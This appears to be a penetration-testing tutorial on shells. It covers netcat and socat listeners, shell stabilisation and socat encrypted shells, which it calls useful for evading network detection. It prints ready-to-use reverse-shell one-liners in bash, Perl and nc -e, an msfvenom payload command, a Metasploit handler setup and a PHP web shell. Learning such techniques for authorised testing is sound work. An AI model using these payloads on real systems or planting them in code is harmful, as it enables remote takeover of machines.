Introduction to Shells

A shell is a command-line interface that allows users to interact with the operating system. It interprets the commands entered by the user and executes the corresponding operations. Shells are fundamental for system administration, programming, and various automation tasks.

Tools

Various tools are used to interact with shells, establish connections, and manage network communications. Two prominent tools in this context are Netcat and Socat.

Types of Shell

There are different types of shells, each serving distinct purposes:

Interactive Shells: Allow users to interact with the system in real-time, executing commands and receiving immediate feedback.
Non-Interactive Shells: Execute scripts and commands without user interaction.
Reverse Shells: The target system connects back to the attacker’s system, providing control over the target.
Bind Shells: The target system opens a port and waits for an incoming connection from the attacker.

Netcat

Netcat, often referred to as the “Swiss Army Knife” of networking, is a versatile tool used for reading from and writing to network connections using TCP or UDP. It’s commonly used to establish simple connections and transfer data.

Basic Netcat Usage

Listening for Connections:
```
nc -lvp 4444
```
This command sets up Netcat to listen on port 4444.
Connecting to a Listener:
```
nc <target-ip> 4444
```
This command connects to a Netcat listener on the target IP and port 4444.

Netcat Shell Stabilisation

When gaining a shell through Netcat, the initial shell might be unstable and lack certain features. Stabilising the shell involves several steps to make it fully interactive and functional.

1. First Method: TTY Spawning with `python`, Raw Mode, and TERM Variable

Steps

Spawn a TTY Shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Background the Shell (Ctrl+Z) and Adjust Terminal Settings:
```
stty raw -echo; fg
```
Export the TERM Variable:
```
export TERM=xterm
```

Advantages

Common for Reverse Shells: This method is particularly tailored for stabilizing reverse shells like those obtained through netcat.
PTY Creation: python -c 'import pty; pty.spawn("/bin/bash")' explicitly spawns a pseudo-terminal (PTY), which is a critical step for making a basic shell interactive.
Minimal Dependencies: This works well in environments where Python is available (common on most Linux systems).
Manual Adjustments: Setting the TERM variable ensures terminal compatibility, especially for applications like vi, nano, or top.

Limitations

Requires Python: The first step relies on Python being installed and accessible, which might not be the case in highly restricted environments.
Not as Automated: It requires manual steps (e.g., exporting TERM) to ensure full terminal capabilities.

Use Case

Particularly suited for reverse shells obtained via tools like nc, PHP, or bash payloads.
When you need full terminal compatibility (e.g., for using text editors or interactive applications).

2. Second Method: `script`, Backgrounding, and Terminal Reset

Steps

Create a Clean Shell with script:
```
script /dev/null -c bash
```
Background the Shell (Ctrl+Z), Reset Terminal, and Foreground:
```
stty -raw echo; fg
```
Clear any Terminal Artifacts:
```
# Press Enter twice
```

Advantages

Generic and Robust: Works in a wider range of environments, as it does not rely on Python or specific utilities.
Automatic Terminal Reset: The script command resets terminal settings to their default state, effectively clearing any misconfigurations.
Pseudo-terminal Handling: The script command internally creates a PTY, stabilizing the shell.
Simpler Sequence: Fewer steps compared to the first method.

Limitations

Depends on script Availability: The script utility may not always be installed, especially in minimal or embedded Linux environments.
Less Granular Control: Unlike the first method, it does not explicitly set the TERM variable, which might cause compatibility issues with certain applications.
Overhead: Spawning a new shell via script introduces slight overhead, which might not be necessary in some cases.

Use Case

When you need a quick and generic way to stabilize an unstable shell.
When you do not have Python installed or cannot spawn a PTY using other means.

Comparison of Both Methods

Feature/Aspect	First Method (Python)	Second Method (`script`)
Scope	Tailored for reverse shells.	Generic, works for any unstable shell.
Dependencies	Requires Python.	Requires the `script` utility.
PTY Creation	Explicit with `pty.spawn()`.	Implicit via `script`.
Terminal Reset	Manual (`stty raw -echo; fg`).	Automatic via `script`.
Terminal Compatibility	Requires manual TERM export.	Defaults to `bash` terminal settings.
Use Case	Reverse shells, especially `nc`.	Generic unstable terminals, broader scenarios.

Which One Should You Use?

Use the First Method if:
- You specifically want to stabilize a reverse shell obtained through netcat, PHP, or similar tools.
- Python is available on the target system.
- You need to ensure full terminal compatibility for interactive programs.
Use the Second Method if:
- You need a more generic solution that doesn’t rely on Python.
- You suspect the terminal is misconfigured or raw mode is causing issues.
- The script command is available, and you want a simpler approach.

Socat

Socat is a more advanced networking tool compared to Netcat. It supports various protocols and provides more robust features for handling network connections.

Basic Socat Usage

Setting Up a Listener:
```
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
```
This command sets up Socat to listen on port 4444 and execute /bin/bash for incoming connections.
Connecting to a Listener:
```
socat TCP:<target-ip>:4444 EXEC:/bin/bash
```
This command connects to a Socat listener on the target IP and port 4444, executing /bin/bash.

Socat Shell Stabilisation

Socat can create a more stable and interactive shell compared to Netcat. Here’s a command for achieving this:

socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Options Explained:
- pty: Allocates a pseudoterminal, stabilising the shell.
- stderr: Ensures error messages are shown.
- sigint: Passes Ctrl+C commands to the subprocess.
- setsid: Runs the process in a new session.
- sane: Normalises the terminal.

Using Netcat and Socat Together

Netcat is initially used to establish a basic connection to the compromised system, which provides a non-interactive shell. Once this basic connection is established, the socat command is used to upgrade the session to a fully interactive terminal. This is achieved by linking to the listener running on the attacker’s machine and creating an interactive bash session with additional options to ensure terminal stability and proper handling of input/output.

Example Workflow

Establish a Basic Connection with Netcat:

On the attacker’s machine, set up a listener:
```
nc -lvp 4444
```
On the target machine, connect back to the attacker:
```
nc <attacker-ip> 4444 -e /bin/bash
```
Upgrade to an Interactive Shell with Socat:

On the attacker’s machine, after receiving the non-interactive shell, execute the following command to set up a more stable interactive shell:
```
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```
This command creates an interactive bash session with enhanced stability and proper handling of terminal input/output.

By combining Netcat and Socat, you can establish an initial connection and then upgrade it to a fully interactive and stable shell, allowing for more effective control over the target system.

Socat Encrypted Shells

Socat supports encrypted connections, enhancing security. This is useful for evading network detection systems.

Setting Up an Encrypted Listener

socat OPENSSL-LISTEN:4444,reuseaddr,fork,cert=server.pem,verify=0 EXEC:/bin/bash

Connecting to an Encrypted Listener

socat OPENSSL:<target-ip>:4444,verify=0 EXEC:/bin/bash

Common Shell Payloads

Common shell payloads are used in various exploitation scenarios to gain control over a target system. These payloads can be generated using tools like Metasploit and msfvenom. For a detailed guide on generating and using shell payloads with Metasploit, refer to this comprehensive guide.

Examples

Bash Reverse Shell:

bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1

Perl Reverse Shell:

perl -e 'use Socket;$i="<attacker-ip>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

msfvenom

msfvenom is a tool for generating various types of payloads used in penetration testing. It combines the functionalities of msfpayload and msfencode.

Basic Usage

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip> LPORT=4444 -f elf -o shell.elf

This command generates a reverse TCP shell payload for Linux in ELF format.

Metasploit multi/handler

Metasploit’s multi/handler is a versatile exploit handler used to receive connections from payloads generated by msfvenom or other methods.

Setting Up a Listener

Start Metasploit:
```
msfconsole
```

Configure multi/handler:

use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST <attacker-ip>
set LPORT 4444
exploit

WebShells

WebShells are scripts uploaded to a web server to gain remote control over it. They can be written in various languages such as PHP, ASP, or JSP.

Example PHP WebShell

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

This simple WebShell executes commands sent via the cmd parameter in a web request.

Table of Contents